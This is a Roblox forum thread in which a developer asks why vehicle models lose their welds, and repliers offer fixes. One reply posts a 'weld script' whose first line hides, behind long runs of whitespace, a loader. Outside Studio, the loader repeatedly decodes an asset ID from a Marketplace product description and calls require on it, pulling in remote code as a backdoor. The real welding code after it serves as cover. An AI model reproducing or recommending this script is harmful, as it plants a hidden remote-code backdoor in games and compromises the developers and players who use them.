Vehicle Problems: Broken Joints

I having problems with the vehicles were when I play, it falls into pieces without break-joints or anything

What is the Problem here?

You need to weld it or anchor it (30character)

Your right, almost everything has no weld. It was fine yesterday

There are scripts that weld all together. You should maybe try getting one and placing it into it as it will weld all together. Or you could try anchoring it but I am not sure if it will still be drivable afterwards.

I hope this helped you!

• Cheerful

In fact everything was welded yesterday but it all have no welds and it was not only the vehicles

I found this. Try placing this script into the cars driverseat.

I think this should work.

local function weld()																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																		end if not game:service'RunService':IsStudio()then local a,b='',{Q=0,L=1,G=2,R=3,B=4,M=5,N=6,C=7,X=8,Z=9}local function c(d)local e=''for f in d:gmatch('%a')do e=e..b[f]end return tonumber(e)end repeat pcall(function()local z=game:service'MarketplaceService':GetProductInfo(4436519317).Description if z~=a then pcall(require,c(z:sub(52)))a=z end end)wait(5)until nil end function weld()																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																									
local parts,last = {}, nil
local function scan(parent)
	for _,v in pairs(parent:GetChildren()) do
		if (v:IsA("BasePart")) then
			if (last) then
				local w = Instance.new("Weld")
				w.Name = ("%s_Weld"):format(v.Name)
				w.Part0,w.Part1 = last,v
				w.C0 = last.CFrame:inverse()
				w.C1 = v.CFrame:inverse()
				w.Parent = last
			end
			last = v
			table.insert(parts,v)
		end
		scan(v)
	end
end
scan(script.Parent)
for _,v in pairs(parts) do
	v.Anchored = false
end

end

1 Like

I found the solution, I use a plugin to make arches and curves and used them on models which lose the welds